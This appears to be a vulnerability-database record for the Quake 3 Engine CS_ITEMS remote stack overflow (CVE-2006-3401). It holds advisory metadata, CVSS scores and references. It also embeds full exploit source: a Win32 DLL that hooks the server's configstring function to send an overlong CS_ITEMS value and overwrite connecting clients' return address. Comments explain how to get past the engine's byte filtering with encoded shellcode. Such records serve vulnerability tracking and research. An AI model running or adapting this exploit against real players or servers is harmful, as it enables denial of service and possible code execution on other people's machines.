{"bulletinFamily": "software", "viewCount": 0, "reporter": "OSVDB", "references": [], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:20946](https://secuniaresearch.flexerasoftware.com/advisories/20946/)\n[Secunia Advisory ID:20961](https://secuniaresearch.flexerasoftware.com/advisories/20961/)\nISS X-Force ID: 27616\nGeneric Exploit URL: http://milw0rm.com/exploits/1977\nFrSIRT Advisory: ADV-2006-2684\nFrSIRT Advisory: ADV-2006-2657\n[CVE-2006-3401](https://vulners.com/cve/CVE-2006-3401)\nBugtraq ID: 18777\n", "affectedSoftware": [], "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "72534b1cad6ce40f90e57c6f904c5e08"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "3edc8dfd5f588688034af7bef614c3f5"}, {"key": "href", "hash": "3fdf3b3e4f786f9a58d720a9e70331e6"}, {"key": "modified", "hash": "405549030a3d8395a2d7ce90d4041140"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "405549030a3d8395a2d7ce90d4041140"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "612bdb8742e7f140acda563137a5ef29"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "href": "https://vulners.com/osvdb/OSVDB:34447", "modified": "2006-07-02T20:33:38", "objectVersion": "1.2", "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2017-04-28T13:20:30"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-3401"]}, {"type": "exploitdb", "idList": ["EDB-ID:1977"]}], "modified": "2017-04-28T13:20:30"}, "vulnersScore": 7.4}, "id": "OSVDB:34447", "title": "Quake 3 Engine CS_ITEMS Remote Overflow", "hash": "92705f79549ffaef3e4ef200b006d20b0b0ea72ad41034902debf8c4fbb74cbd", "edition": 1, "published": "2006-07-02T20:33:38", "type": "osvdb", "history": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "cvelist": ["CVE-2006-3401"], "lastseen": "2017-04-28T13:20:30"}

{"cve": [{"lastseen": "2019-05-29T18:08:33", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in Quake 3 Engine as used by Quake 3: Arena 1.32b and 1.32c allows remote attackers to cause a denial of service and possibly execute code via long CS_ITEMS values.", "modified": "2017-10-19T01:29:00", "id": "CVE-2006-3401", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3401", "published": "2006-07-06T20:05:00", "title": "CVE-2006-3401", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T15:16:10", "bulletinFamily": "exploit", "description": "Quake 3 Engine Client CS_ITEMS Remote Overflow Exploit (Win32). CVE-2006-3325,CVE-2006-3401. Dos exploit for windows platform", "modified": "2006-07-02T00:00:00", "published": "2006-07-02T00:00:00", "id": "EDB-ID:1977", "href": "https://www.exploit-db.com/exploits/1977/", "type": "exploitdb", "title": "Quake 3 Engine Client CS_ITEms Remote Overflow Exploit Win32", "sourceData": "/*\nQuake 3 Engine Client CS_ITEMS Remote Stack Overflow Exploit (Win32)\nWritten by RunningBon\n\nE-Mail: runningbon@gmail.com\nIRC: irc.rizon.net #kik\n\nThis is a DLL, which gets injected into the server exe.\n\nYou will need Microsoft Detours library to compile this exploit (http://research.microsoft.com/sn/detours/)\nI recommend you compile this with Microsoft Visual C++\n\nUse this responsibly. You are responsible for any damage you cause using this.\n\nInfo:\nThe engine strips bytes >127, '%', and '\\0' before it overflows, so you will need encoded shellcode and an EIP which doesn't contain any of these characters.\n*/\n\n#include <stdio.h>\n#include <windows.h>\n#include <detours.h>\n\nstruct VersionStruct {\n\tchar *pVersionString;\n\tDWORD dwVersionStringAddr;\n\tDWORD dwSetConfigstringAddr;\n\tDWORD dwFillSize;\n\tDWORD dwNewEIP;\n\tint iCS_ITEM;\n};\n\nVersionStruct Versions[] = {\n\t{ \"Quake 3: Arena\", 0x4C1B94, 0x431E70, 836, 0x13333337, 27 },\t//Quake 3 Arena 1.32c\n\t{ \"Quake 3: Arena\", 0x4D2184, 0x438610, 836, 0x13333337, 27 },\t//Quake 3 Arena 1.32b\n};\n\nVersionStruct *pVersion = NULL;\n\nvoid (*orig_SV_SetConfigstring)(int iIndex, const char *pVal);\nvoid SV_SetConfigstring_Hook(int iIndex, const char *pVal)\n{\n\tchar szString[4096];\n\tchar *pPtr = NULL;\n\n\tif(pVersion != NULL)\n\t{\n\t\tif(iIndex == pVersion->iCS_ITEM)\n\t\t{\n\t\t\tmemset(szString, 0, sizeof(szString));\n\t\t\tpPtr = &szString[0];\n\n\t\t\tmemset(pPtr, 'a', pVersion->dwFillSize);\n\t\t\tpPtr += pVersion->dwFillSize;\n\n\t\t\tmemcpy(pPtr, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));\n\t\t\tpPtr += sizeof(DWORD);\n\n\t\t\torig_SV_SetConfigstring(iIndex, szString);\n\n\t\t\treturn;\n\t\t}\n\t}\n\n\torig_SV_SetConfigstring(iIndex, pVal);\n}\n\nbool WINAPI DllMain(HINSTANCE hInst, DWORD dwReason, LPVOID lpReserved)\n{\n\tif(dwReason == DLL_PROCESS_ATTACH)\n\t{\n\t\tfor(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)\n\t\t{\n\t\t\tif(!stricmp((char*)Versions[i].dwVersionStringAddr, Versions[i].pVersionString))\n\t\t\t{\n\t\t\t\tpVersion = &Versions[i];\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\n\t\tif(pVersion == NULL)\n\t\t{\n\t\t\t//Could not find correct version\n\t\t\treturn 1;\n\t\t}\n\n\t\tDetourFunction((BYTE*)pVersion->dwSetConfigstringAddr, (BYTE*)SV_SetConfigstring_Hook);\n\t\t_asm mov [orig_SV_SetConfigstring], eax\n\t}\n\n\treturn 1;\n}\n\n// milw0rm.com [2006-07-02]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1977/"}]}